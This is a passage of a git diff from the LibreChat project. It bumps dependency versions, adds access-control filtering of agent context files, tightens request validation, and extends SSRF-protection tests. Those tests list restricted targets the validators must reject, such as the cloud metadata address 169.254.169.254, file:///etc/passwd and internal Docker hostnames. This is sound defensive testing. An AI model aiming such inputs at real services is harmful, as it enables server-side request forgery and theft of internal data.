"https://registry.npmjs.org/undici/-/undici-7.20.0.tgz", - "integrity": "sha512-MJZrkjyd7DeC+uPZh+5/YaMDxFiiEEaDgbUSVMXayofAkDWF1088CDo+2RPg7B1BuS1qf1vgNE7xqwPxE0DuSQ==", + "version": "7.24.1", + "resolved": "https://registry.npmjs.org/undici/-/undici-7.24.1.tgz", + "integrity": "sha512-5xoBibbmnjlcR3jdqtY2Lnx7WbrD/tHlT01TmvqZUFVc9Q1w4+j5hbnapTqbcXITMH1ovjq/W7BkqBilHiVAaA==", "license": "MIT", "engines": { "node": ">=20.18.1" @@ -44097,9 +44132,9 @@ } }, "node_modules/yauzl": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.0.tgz", - "integrity": "sha512-Ow9nuGZE+qp1u4JIPvg+uCiUr7xGQWdff7JQSk5VGYTAZMDe2q8lxJ10ygv10qmSj031Ty/6FNJpLO4o1Sgc+w==", + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-3.2.1.tgz", + "integrity": "sha512-k1isifdbpNSFEHFJ1ZY4YDewv0IH9FR61lDetaRMD3j2ae3bIXGV+7c+LHCqtQGofSd8PIyV4X6+dHMAnSr60A==", "dev": true, "license": "MIT", "dependencies": { @@ -44205,7 +44240,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/data-schemas": "*", "@modelcontextprotocol/sdk": "^1.27.1", "@smithy/node-http-handler": "^4.4.5", @@ -44232,7 +44267,7 @@ "node-fetch": "2.7.0", "pdfjs-dist": "^5.4.624", "rate-limit-redis": "^4.2.0", - "undici": "^7.18.2", + "undici": "^7.24.1", "zod": "^3.22.4" } }, diff --git a/packages/api/package.json b/packages/api/package.json index 966447c51b..b3b40c79a2 100644 --- a/packages/api/package.json +++ b/packages/api/package.json @@ -90,7 +90,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/data-schemas": "*", "@modelcontextprotocol/sdk": "^1.27.1", "@smithy/node-http-handler": "^4.4.5", @@ -117,7 +117,7 @@ "node-fetch": "2.7.0", "pdfjs-dist": "^5.4.624", "rate-limit-redis": "^4.2.0", - "undici": "^7.18.2", + "undici": "^7.24.1", "zod": 
"^3.22.4" } } diff --git a/packages/api/src/agents/edges.spec.ts b/packages/api/src/agents/edges.spec.ts index 1b30a202d0..b23f00f63f 100644 --- a/packages/api/src/agents/edges.spec.ts +++ b/packages/api/src/agents/edges.spec.ts @@ -1,5 +1,11 @@ import type { GraphEdge } from 'librechat-data-provider'; -import { getEdgeKey, getEdgeParticipants, filterOrphanedEdges, createEdgeCollector } from './edges'; +import { + getEdgeKey, + getEdgeParticipants, + collectEdgeAgentIds, + filterOrphanedEdges, + createEdgeCollector, +} from './edges'; describe('edges utilities', () => { describe('getEdgeKey', () => { @@ -70,6 +76,49 @@ describe('edges utilities', () => { }); }); + describe('collectEdgeAgentIds', () => { + it('should return empty set for undefined input', () => { + expect(collectEdgeAgentIds(undefined)).toEqual(new Set()); + }); + + it('should return empty set for empty array', () => { + expect(collectEdgeAgentIds([])).toEqual(new Set()); + }); + + it('should collect IDs from simple string from/to', () => { + const edges: GraphEdge[] = [{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }]; + expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b'])); + }); + + it('should collect IDs from array from/to values', () => { + const edges: GraphEdge[] = [ + { from: ['agent_a', 'agent_b'], to: ['agent_c', 'agent_d'], edgeType: 'handoff' }, + ]; + expect(collectEdgeAgentIds(edges)).toEqual( + new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d']), + ); + }); + + it('should deduplicate IDs across edges', () => { + const edges: GraphEdge[] = [ + { from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }, + { from: 'agent_b', to: 'agent_c', edgeType: 'handoff' }, + { from: 'agent_a', to: 'agent_c', edgeType: 'direct' }, + ]; + expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b', 'agent_c'])); + }); + + it('should handle mixed scalar and array edges', () => { + const edges: GraphEdge[] = [ + { from: 'agent_a', to: ['agent_b', 'agent_c'], 
edgeType: 'handoff' }, + { from: ['agent_c', 'agent_d'], to: 'agent_e', edgeType: 'direct' }, + ]; + expect(collectEdgeAgentIds(edges)).toEqual( + new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d', 'agent_e']), + ); + }); + }); + describe('filterOrphanedEdges', () => { const edges: GraphEdge[] = [ { from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }, diff --git a/packages/api/src/agents/edges.ts b/packages/api/src/agents/edges.ts index 4d2883d165..9a36105b74 100644 --- a/packages/api/src/agents/edges.ts +++ b/packages/api/src/agents/edges.ts @@ -43,6 +43,20 @@ export function filterOrphanedEdges(edges: GraphEdge[], skippedAgentIds: Set { + const ids = new Set(); + if (!edges || edges.length === 0) { + return ids; + } + for (const edge of edges) { + for (const id of getEdgeParticipants(edge)) { + ids.add(id); + } + } + return ids; +} + /** * Result of discovering and aggregating edges from connected agents. */ diff --git a/packages/api/src/agents/initialize.ts b/packages/api/src/agents/initialize.ts index af604beb81..d5bfca5aba 100644 --- a/packages/api/src/agents/initialize.ts +++ b/packages/api/src/agents/initialize.ts @@ -31,6 +31,7 @@ import { filterFilesByEndpointConfig } from '~/files'; import { generateArtifactsPrompt } from '~/prompts'; import { getProviderConfig } from '~/endpoints'; import { primeResources } from './resources'; +import type { TFilterFilesByAgentAccess } from './resources'; /** * Extended agent type with additional fields needed after initialization @@ -52,6 +53,8 @@ export type InitializedAgent = Agent & { toolDefinitions?: LCTool[]; /** Precomputed flag indicating if any tools have defer_loading enabled (for efficient runtime checks) */ hasDeferredTools?: boolean; + /** Whether the actions capability is enabled (resolved during tool loading) */ + actionsEnabled?: boolean; }; /** @@ -90,6 +93,7 @@ export interface InitializeAgentParams { /** Serializable tool definitions for event-driven mode */ toolDefinitions?: LCTool[]; 
hasDeferredTools?: boolean; + actionsEnabled?: boolean; } | null>; /** Endpoint option (contains model_parameters and endpoint info) */ endpointOption?: Partial; @@ -108,7 +112,9 @@ export interface InitializeAgentDbMethods extends EndpointDbMethods { /** Update usage tracking for multiple files */ updateFilesUsage: (files: Array<{ file_id: string }>, fileIds?: string[]) => Promise; /** Get files from database */ - getFiles: (filter: unknown, sort: unknown, select: unknown, opts?: unknown) => Promise; + getFiles: (filter: unknown, sort: unknown, select: unknown) => Promise; + /** Filter files by agent access permissions (ownership or agent attachment) */ + filterFilesByAgentAccess?: TFilterFilesByAgentAccess; /** Get tool files by IDs (user-uploaded files only, code files handled separately) */ getToolFilesByIds: (fileIds: string[], toolSet: Set) => Promise; /** Get conversation file IDs */ @@ -268,6 +274,7 @@ export async function initializeAgent( const { attachments: primedAttachments, tool_resources } = await primeResources({ req: req as never, getFiles: db.getFiles as never, + filterFiles: db.filterFilesByAgentAccess, appConfig: req.config, agentId: agent.id, attachments: currentFiles @@ -283,6 +290,7 @@ export async function initializeAgent( userMCPAuthMap, toolDefinitions, hasDeferredTools, + actionsEnabled, tools: structuredTools, } = (await loadTools?.({ req, @@ -300,6 +308,7 @@ export async function initializeAgent( toolRegistry: undefined, toolDefinitions: [], hasDeferredTools: false, + actionsEnabled: undefined, }; const { getOptions, overrideProvider } = getProviderConfig({ @@ -409,6 +418,7 @@ export async function initializeAgent( userMCPAuthMap, toolDefinitions, hasDeferredTools, + actionsEnabled, attachments: finalAttachments, toolContextMap: toolContextMap ?? 
{}, useLegacyContent: !!options.useLegacyContent, diff --git a/packages/api/src/agents/openai/service.ts b/packages/api/src/agents/openai/service.ts index 807ce8db71..90190ce7ce 100644 --- a/packages/api/src/agents/openai/service.ts +++ b/packages/api/src/agents/openai/service.ts @@ -289,6 +289,14 @@ export function validateRequest(body: unknown): ChatCompletionValidationResult { } } + if (request.conversation_id !== undefined && typeof request.conversation_id !== 'string') { + return { valid: false, error: 'conversation_id must be a string' }; + } + + if (request.parent_message_id !== undefined && typeof request.parent_message_id !== 'string') { + return { valid: false, error: 'parent_message_id must be a string' }; + } + return { valid: true, request: request as unknown as ChatCompletionRequest }; } diff --git a/packages/api/src/agents/resources.test.ts b/packages/api/src/agents/resources.test.ts index bfd2327764..641fb9284c 100644 --- a/packages/api/src/agents/resources.test.ts +++ b/packages/api/src/agents/resources.test.ts @@ -4,7 +4,7 @@ import { EModelEndpoint, EToolResources, AgentCapabilities } from 'librechat-dat import type { TAgentsEndpoint, TFile } from 'librechat-data-provider'; import type { IUser, AppConfig } from '@librechat/data-schemas'; import type { Request as ServerRequest } from 'express'; -import type { TGetFiles } from './resources'; +import type { TGetFiles, TFilterFilesByAgentAccess } from './resources'; // Mock logger jest.mock('@librechat/data-schemas', () => ({ @@ -17,16 +17,16 @@ describe('primeResources', () => { let mockReq: ServerRequest & { user?: IUser }; let mockAppConfig: AppConfig; let mockGetFiles: jest.MockedFunction; + let mockFilterFiles: jest.MockedFunction; let requestFileSet: Set; beforeEach(() => { - // Reset mocks jest.clearAllMocks(); - // Setup mock request - mockReq = {} as unknown as ServerRequest & { user?: IUser }; + mockReq = { + user: { id: 'user1', role: 'USER' }, + } as unknown as ServerRequest & { user?: 
IUser }; - // Setup mock appConfig mockAppConfig = { endpoints: { [EModelEndpoint.agents]: { @@ -35,10 +35,9 @@ describe('primeResources', () => { }, } as AppConfig; - // Setup mock getFiles function mockGetFiles = jest.fn(); + mockFilterFiles = jest.fn().mockImplementation(({ files }) => Promise.resolve(files)); - // Setup request file set requestFileSet = new Set(['file1', 'file2', 'file3']); }); @@ -70,20 +69,21 @@ describe('primeResources', () => { req: mockReq, appConfig: mockAppConfig, getFiles: mockGetFiles, + filterFiles: mockFilterFiles, requestFileSet, attachments: undefined, tool_resources, + agentId: 'agent_test', }); - expect(mockGetFiles).toHaveBeenCalledWith( - { file_id: { $in: ['ocr-file-1'] } }, - {}, - {}, - { userId: undefined, agentId: undefined }, - ); + expect(mockGetFiles).toHaveBeenCalledWith({ file_id: { $in: ['ocr-file-1'] } }, {}, {}); + expect(mockFilterFiles).toHaveBeenCalledWith({ + files: mockOcrFiles, + userId: 'user1', + role: 'USER', + agentId: 'agent_test', + }); expect(result.attachments).toEqual(mockOcrFiles); - // Context field is deleted after files are fetched and re-categorized - // Since the file is not embedded and has no special properties, it won't be categorized expect(result.tool_resources).toEqual({}); }); }); @@ -1108,12 +1108,10 @@ describe('primeResources', () => { 'ocr-file-1', ); - // Verify getFiles was called with merged file_ids expect(mockGetFiles).toHaveBeenCalledWith( { file_id: { $in: ['context-file-1', 'ocr-file-1'] } }, {}, {}, - { userId: undefined, agentId: undefined }, ); }); @@ -1241,6 +1239,249 @@ describe('primeResources', () => { }); }); + describe('access control filtering', () => { + it('should filter context files through filterFiles when provided', async () => { + const ownedFile: TFile = { + user: 'user1', + file_id: 'owned-file', + filename: 'owned.pdf', + filepath: '/uploads/owned.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + 
const inaccessibleFile: TFile = { + user: 'other-user', + file_id: 'inaccessible-file', + filename: 'secret.pdf', + filepath: '/uploads/secret.pdf', + object: 'file', + type: 'application/pdf', + bytes: 2048, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([ownedFile, inaccessibleFile]); + mockFilterFiles.mockResolvedValue([ownedFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['owned-file', 'inaccessible-file'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_shared', + }); + + expect(mockFilterFiles).toHaveBeenCalledWith({ + files: [ownedFile, inaccessibleFile], + userId: 'user1', + role: 'USER', + agentId: 'agent_shared', + }); + expect(result.attachments).toEqual([ownedFile]); + expect(result.attachments).not.toContainEqual(inaccessibleFile); + }); + + it('should filter OCR files merged into context through filterFiles', async () => { + const ocrFile: TFile = { + user: 'other-user', + file_id: 'ocr-restricted', + filename: 'scan.pdf', + filepath: '/uploads/scan.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([ocrFile]); + mockFilterFiles.mockResolvedValue([]); + + const tool_resources = { + [EToolResources.ocr]: { + file_ids: ['ocr-restricted'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_shared', + }); + + expect(mockFilterFiles).toHaveBeenCalledWith({ + files: [ocrFile], + userId: 'user1', + role: 'USER', + agentId: 'agent_shared', + }); + expect(result.attachments).toBeUndefined(); + }); + + it('should skip filtering when filterFiles is not 
provided', async () => { + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_test', + }); + + expect(mockFilterFiles).not.toHaveBeenCalled(); + expect(result.attachments).toEqual([mockFile]); + }); + + it('should skip filtering when user ID is missing', async () => { + const reqNoUser = {} as unknown as ServerRequest & { user?: IUser }; + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: reqNoUser, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_test', + }); + + expect(mockFilterFiles).not.toHaveBeenCalled(); + expect(result.attachments).toEqual([mockFile]); + }); + + it('should gracefully handle filterFiles rejection', async () => { + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + mockFilterFiles.mockRejectedValue(new Error('DB failure')); + + const tool_resources = { + [EToolResources.context]: { 
+ file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + agentId: 'agent_test', + }); + + expect(logger.error).toHaveBeenCalledWith('Error priming resources', expect.any(Error)); + expect(result.tool_resources).toEqual(tool_resources); + }); + + it('should skip filtering when agentId is missing', async () => { + const mockFile: TFile = { + user: 'user1', + file_id: 'file-1', + filename: 'doc.pdf', + filepath: '/uploads/doc.pdf', + object: 'file', + type: 'application/pdf', + bytes: 1024, + embedded: false, + usage: 0, + }; + + mockGetFiles.mockResolvedValue([mockFile]); + + const tool_resources = { + [EToolResources.context]: { + file_ids: ['file-1'], + }, + }; + + const result = await primeResources({ + req: mockReq, + appConfig: mockAppConfig, + getFiles: mockGetFiles, + filterFiles: mockFilterFiles, + requestFileSet, + attachments: undefined, + tool_resources, + }); + + expect(mockFilterFiles).not.toHaveBeenCalled(); + expect(result.attachments).toEqual([mockFile]); + }); + }); + describe('edge cases', () => { it('should handle missing appConfig agents endpoint gracefully', async () => { const reqWithoutLocals = {} as ServerRequest & { user?: IUser }; diff --git a/packages/api/src/agents/resources.ts b/packages/api/src/agents/resources.ts index 4655453847..e147c743cf 100644 --- a/packages/api/src/agents/resources.ts +++ b/packages/api/src/agents/resources.ts @@ -10,16 +10,26 @@ import type { Request as ServerRequest } from 'express'; * @param filter - MongoDB filter query for files * @param _sortOptions - Sorting options (currently unused) * @param selectFields - Field selection options - * @param options - Additional options including userId and agentId for access control * @returns Promise resolving to array of files */ export type TGetFiles = ( filter: FilterQuery, 
_sortOptions: ProjectionType | null | undefined, selectFields: QueryOptions | null | undefined, - options?: { userId?: string; agentId?: string }, ) => Promise>; +/** + * Function type for filtering files by agent access permissions. + * Used to enforce that only files the user has access to (via ownership or agent attachment) + * are returned after a raw DB query. + */ +export type TFilterFilesByAgentAccess = (params: { + files: Array; + userId: string; + role?: string; + agentId: string; +}) => Promise>; + /** * Helper function to add a file to a specific tool resource category * Prevents duplicate files within the same resource category @@ -128,7 +138,7 @@ const categorizeFileForToolResources = ({ /** * Primes resources for agent execution by processing attachments and tool resources * This function: - * 1. Fetches OCR files if OCR is enabled + * 1. Fetches context/OCR files (filtered by agent access control when available) * 2. Processes attachment files * 3. Categorizes files into appropriate tool resources * 4. 
Prevents duplicate files across all sources @@ -137,15 +147,18 @@ const categorizeFileForToolResources = ({ * @param params.req - Express request object * @param params.appConfig - Application configuration object * @param params.getFiles - Function to retrieve files from database + * @param params.filterFiles - Optional function to enforce agent-based file access control * @param params.requestFileSet - Set of file IDs from the current request * @param params.attachments - Promise resolving to array of attachment files * @param params.tool_resources - Existing tool resources for the agent + * @param params.agentId - Agent ID used for access control filtering * @returns Promise resolving to processed attachments and updated tool resources */ export const primeResources = async ({ req, appConfig, getFiles, + filterFiles, requestFileSet, attachments: _attachments, tool_resources: _tool_resources, @@ -157,6 +170,7 @@ export const primeResources = async ({ attachments: Promise> | undefined; tool_resources: AgentToolResources | undefined; getFiles: TGetFiles; + filterFiles?: TFilterFilesByAgentAccess; agentId?: string; }): Promise<{ attachments: Array | undefined; @@ -228,15 +242,23 @@ export const primeResources = async ({ if (fileIds.length > 0 && isContextEnabled) { delete tool_resources[EToolResources.context]; - const context = await getFiles( + let context = await getFiles( { file_id: { $in: fileIds }, }, {}, {}, - { userId: req.user?.id, agentId }, ); + if (filterFiles && req.user?.id && agentId) { + context = await filterFiles({ + files: context, + userId: req.user.id, + role: req.user.role, + agentId, + }); + } + for (const file of context) { if (!file?.file_id) { continue; diff --git a/packages/api/src/agents/responses/service.ts b/packages/api/src/agents/responses/service.ts index 2e49b1b979..575606123c 100644 --- a/packages/api/src/agents/responses/service.ts +++ b/packages/api/src/agents/responses/service.ts @@ -84,6 +84,13 @@ export function 
validateResponseRequest(body: unknown): RequestValidationResult } } + if ( + request.previous_response_id !== undefined && + typeof request.previous_response_id !== 'string' + ) { + return { valid: false, error: 'previous_response_id must be a string' }; + } + return { valid: true, request: request as unknown as ResponseRequest }; } diff --git a/packages/api/src/auth/domain.spec.ts b/packages/api/src/auth/domain.spec.ts index 9812960cd9..88a7c98160 100644 --- a/packages/api/src/auth/domain.spec.ts +++ b/packages/api/src/auth/domain.spec.ts @@ -8,10 +8,12 @@ import { extractMCPServerDomain, isActionDomainAllowed, isEmailDomainAllowed, + isOAuthUrlAllowed, isMCPDomainAllowed, isPrivateIP, isSSRFTarget, resolveHostnameSSRF, + validateEndpointURL, } from './domain'; const mockedLookup = lookup as jest.MockedFunction; @@ -177,6 +179,20 @@ describe('isSSRFTarget', () => { expect(isSSRFTarget('fd00::1')).toBe(true); expect(isSSRFTarget('fe80::1')).toBe(true); }); + + it('should block full fe80::/10 link-local range (fe80–febf)', () => { + expect(isSSRFTarget('fe90::1')).toBe(true); + expect(isSSRFTarget('fea0::1')).toBe(true); + expect(isSSRFTarget('feb0::1')).toBe(true); + expect(isSSRFTarget('febf::1')).toBe(true); + expect(isSSRFTarget('fec0::1')).toBe(false); + }); + + it('should NOT false-positive on hostnames whose first label resembles a link-local prefix', () => { + expect(isSSRFTarget('fe90.example.com')).toBe(false); + expect(isSSRFTarget('fea0.api.io')).toBe(false); + expect(isSSRFTarget('febf.service.net')).toBe(false); + }); }); describe('internal hostnames', () => { @@ -277,10 +293,17 @@ describe('isPrivateIP', () => { expect(isPrivateIP('[::1]')).toBe(true); }); - it('should detect unique local (fc/fd) and link-local (fe80)', () => { + it('should detect unique local (fc/fd) and link-local (fe80::/10)', () => { expect(isPrivateIP('fc00::1')).toBe(true); expect(isPrivateIP('fd00::1')).toBe(true); expect(isPrivateIP('fe80::1')).toBe(true); + 
expect(isPrivateIP('fe90::1')).toBe(true); + expect(isPrivateIP('fea0::1')).toBe(true); + expect(isPrivateIP('feb0::1')).toBe(true); + expect(isPrivateIP('febf::1')).toBe(true); + expect(isPrivateIP('[fe90::1]')).toBe(true); + expect(isPrivateIP('fec0::1')).toBe(false); + expect(isPrivateIP('fe90.example.com')).toBe(false); }); }); @@ -482,6 +505,8 @@ describe('resolveHostnameSSRF', () => { expect(await resolveHostnameSSRF('::1')).toBe(true); expect(await resolveHostnameSSRF('fc00::1')).toBe(true); expect(await resolveHostnameSSRF('fe80::1')).toBe(true); + expect(await resolveHostnameSSRF('fe90::1')).toBe(true); + expect(await resolveHostnameSSRF('febf::1')).toBe(true); expect(mockedLookup).not.toHaveBeenCalled(); }); @@ -1023,8 +1048,37 @@ describe('isMCPDomainAllowed', () => { }); describe('invalid URL handling', () => { - it('should allow config with invalid URL (treated as stdio)', async () => { + it('should reject invalid URL when allowlist is configured', async () => { const config = { url: 'not-a-valid-url' }; + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false); + }); + + it('should reject templated URL when allowlist is configured', async () => { + const config = { url: 'http://{{CUSTOM_HOST}}/mcp' }; + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false); + }); + + it('should allow invalid URL when no allowlist is configured (defers to connection-level SSRF)', async () => { + const config = { url: 'http://{{CUSTOM_HOST}}/mcp' }; + expect(await isMCPDomainAllowed(config, null)).toBe(true); + expect(await isMCPDomainAllowed(config, undefined)).toBe(true); + expect(await isMCPDomainAllowed(config, [])).toBe(true); + }); + + it('should allow config with whitespace-only URL (treated as absent)', async () => { + const config = { url: ' ' }; + expect(await isMCPDomainAllowed(config, [])).toBe(true); + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); + expect(await isMCPDomainAllowed(config, 
null)).toBe(true); + }); + + it('should allow config with empty string URL (treated as absent)', async () => { + const config = { url: '' }; + expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); + }); + + it('should allow config with no url property (stdio)', async () => { + const config = { command: 'node', args: ['server.js'] }; expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true); }); }); @@ -1157,3 +1211,225 @@ describe('isMCPDomainAllowed', () => { }); }); }); + +describe('isOAuthUrlAllowed', () => { + it('should return false when allowedDomains is null/undefined/empty', () => { + expect(isOAuthUrlAllowed('https://example.com/token', null)).toBe(false); + expect(isOAuthUrlAllowed('https://example.com/token', undefined)).toBe(false); + expect(isOAuthUrlAllowed('https://example.com/token', [])).toBe(false); + }); + + it('should return false for unparseable URLs', () => { + expect(isOAuthUrlAllowed('not-a-url', ['example.com'])).toBe(false); + }); + + it('should match exact hostnames', () => { + expect(isOAuthUrlAllowed('https://example.com/token', ['example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://other.com/token', ['example.com'])).toBe(false); + }); + + it('should match wildcard subdomains', () => { + expect(isOAuthUrlAllowed('https://api.example.com/token', ['*.example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://deep.nested.example.com/token', ['*.example.com'])).toBe( + true, + ); + expect(isOAuthUrlAllowed('https://example.com/token', ['*.example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://other.com/token', ['*.example.com'])).toBe(false); + }); + + it('should be case-insensitive', () => { + expect(isOAuthUrlAllowed('https://EXAMPLE.COM/token', ['example.com'])).toBe(true); + expect(isOAuthUrlAllowed('https://example.com/token', ['EXAMPLE.COM'])).toBe(true); + }); + + it('should match private/internal URLs when hostname is in allowedDomains', () => { + 
expect(isOAuthUrlAllowed('http://localhost:8080/token', ['localhost'])).toBe(true); + expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['10.0.0.1'])).toBe(true); + expect( + isOAuthUrlAllowed('http://host.docker.internal:8044/token', ['host.docker.internal']), + ).toBe(true); + expect(isOAuthUrlAllowed('http://myserver.local/token', ['*.local'])).toBe(true); + }); + + it('should match internal URLs with wildcard patterns', () => { + expect(isOAuthUrlAllowed('https://auth.company.internal/token', ['*.company.internal'])).toBe( + true, + ); + expect(isOAuthUrlAllowed('https://company.internal/token', ['*.company.internal'])).toBe(true); + }); + + it('should not match when hostname is absent from allowedDomains', () => { + expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['192.168.1.1'])).toBe(false); + expect(isOAuthUrlAllowed('http://localhost/token', ['host.docker.internal'])).toBe(false); + }); + + describe('protocol and port constraint enforcement', () => { + it('should enforce protocol when allowedDomains specifies one', () => { + expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal'])).toBe( + true, + ); + expect(isOAuthUrlAllowed('http://auth.internal/token', ['https://auth.internal'])).toBe( + false, + ); + }); + + it('should allow any protocol when allowedDomains has bare hostname', () => { + expect(isOAuthUrlAllowed('http://auth.internal/token', ['auth.internal'])).toBe(true); + expect(isOAuthUrlAllowed('https://auth.internal/token', ['auth.internal'])).toBe(true); + }); + + it('should enforce port when allowedDomains specifies one', () => { + expect( + isOAuthUrlAllowed('https://auth.internal:8443/token', ['https://auth.internal:8443']), + ).toBe(true); + expect( + isOAuthUrlAllowed('https://auth.internal:6379/token', ['https://auth.internal:8443']), + ).toBe(false); + expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal:8443'])).toBe( + false, + ); + }); + + it('should allow any port when 
allowedDomains has no explicit port', () => { + expect(isOAuthUrlAllowed('https://auth.internal:8443/token', ['auth.internal'])).toBe(true); + expect(isOAuthUrlAllowed('https://auth.internal:22/token', ['auth.internal'])).toBe(true); + }); + + it('should reject wrong port even when hostname matches (prevents port-scanning)', () => { + expect(isOAuthUrlAllowed('http://10.0.0.1:6379/token', ['http://10.0.0.1:8080'])).toBe(false); + expect(isOAuthUrlAllowed('http://10.0.0.1:25/token', ['http://10.0.0.1:8080'])).toBe(false); + }); + }); +}); + +describe('validateEndpointURL', () => { + afterEach(() => { + jest.clearAllMocks(); + }); + + it('should throw for unparseable URLs', async () => { + await expect(validateEndpointURL('not-a-url', 'test-ep')).rejects.toThrow( + 'Invalid base URL for test-ep', + ); + }); + + it('should throw for localhost URLs', async () => { + await expect(validateEndpointURL('http://localhost:8080/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for private IP URLs', async () => { + await expect(validateEndpointURL('http://192.168.1.1/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + await expect(validateEndpointURL('http://10.0.0.1/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + await expect(validateEndpointURL('http://172.16.0.1/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for link-local / metadata IP', async () => { + await expect( + validateEndpointURL('http://169.254.169.254/latest/meta-data/', 'test-ep'), + ).rejects.toThrow('targets a restricted address'); + }); + + it('should throw for loopback IP', async () => { + await expect(validateEndpointURL('http://127.0.0.1:11434/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for internal Docker/Kubernetes hostnames', async () => { + await expect(validateEndpointURL('http://redis:6379/', 
'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + await expect(validateEndpointURL('http://mongodb:27017/', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw when hostname DNS-resolves to a private IP', async () => { + mockedLookup.mockResolvedValueOnce([{ address: '10.0.0.5', family: 4 }] as never); + await expect(validateEndpointURL('https://evil.example.com/v1', 'test-ep')).rejects.toThrow( + 'resolves to a restricted address', + ); + }); + + it('should allow public URLs', async () => { + mockedLookup.mockResolvedValueOnce([{ address: '104.18.7.192', family: 4 }] as never); + await expect( + validateEndpointURL('https://api.openai.com/v1', 'test-ep'), + ).resolves.toBeUndefined(); + }); + + it('should allow public URLs that resolve to public IPs', async () => { + mockedLookup.mockResolvedValueOnce([{ address: '8.8.8.8', family: 4 }] as never); + await expect( + validateEndpointURL('https://api.example.com/v1/chat', 'test-ep'), + ).resolves.toBeUndefined(); + }); + + it('should throw for non-HTTP/HTTPS schemes', async () => { + await expect(validateEndpointURL('ftp://example.com/v1', 'test-ep')).rejects.toThrow( + 'only HTTP and HTTPS are permitted', + ); + await expect(validateEndpointURL('file:///etc/passwd', 'test-ep')).rejects.toThrow( + 'only HTTP and HTTPS are permitted', + ); + await expect(validateEndpointURL('data:text/plain,hello', 'test-ep')).rejects.toThrow( + 'only HTTP and HTTPS are permitted', + ); + }); + + it('should throw for IPv6 loopback URL', async () => { + await expect(validateEndpointURL('http://[::1]:8080/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for IPv6 link-local URL', async () => { + await expect(validateEndpointURL('http://[fe80::1]/v1', 'test-ep')).rejects.toThrow( + 'targets a restricted address', + ); + }); + + it('should throw for IPv6 unique-local URL', async () => { + await 
